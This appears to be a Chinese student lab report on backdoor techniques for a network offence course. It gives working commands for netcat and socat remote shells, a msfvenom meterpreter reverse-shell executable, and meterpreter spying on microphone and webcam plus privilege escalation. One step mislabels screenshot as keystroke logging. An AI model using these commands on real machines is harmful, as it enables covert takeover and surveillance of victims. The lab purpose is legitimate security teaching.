20155304《网络对抗》Exp2 后门原理与实践
20155332《网络对抗》Exp2 后门原理与实践
实验内容 (3.5分)
(1)使用netcat获取主机操作Shell,cron启动 (0.5分)
(2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。
实验步骤
3.1使用netcat获取主机操作Shell,cron启动
1.在win10的cmd里,查询本机ip。
ip为192.168.1.101
2.在win10的cmd里,进入ncat,输入ncat -l -e cmd.exe -p 5304
2.在kali的终端里,输入nc 192.168.1.101 5304 连接win10,获得shell权限
3.2使用socat获取主机操作Shell, 任务计划启动
1.在win10中进入控制面板->系统和安全->管理工具->任务计划程序
然后选择创建一个新任务,填写好任务名称;新建一个触发器,并设置触发器的相关参数;新建操作,设置如图相关参数tcp-listen:端口号 exec:cmd.exe,pty,stderr
2.在kali虚拟机中,socat - tcp:192.168.1.101:5404
,就可以获得win10的shell权限了
3.3使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1.在kali虚拟机中用Meterpreter生成后门。
输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.128 LPORT=5304 -f exe > backdoor.exe
通过nc指令将生成的后门程序传送到Windows主机上:
在kali虚拟机终端输入 msfconsole
在msf的命令下输入命令use exploit/multi/handler,payload设置命令set payload windows/meterpreter/reverse_tcp,继续设置IP(此处设置虚拟机的Linux的IP地址)和端口
Linux使用exploit命令开始监听,此时在Win上执行后门程序。
打开Windows上的后门程序
此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
录音功能:record_mic
拍照功能:webcam_snap
拍摄视频功能:webcam_stream
记录击键功能:screenshot
提权:getuid以及getsystem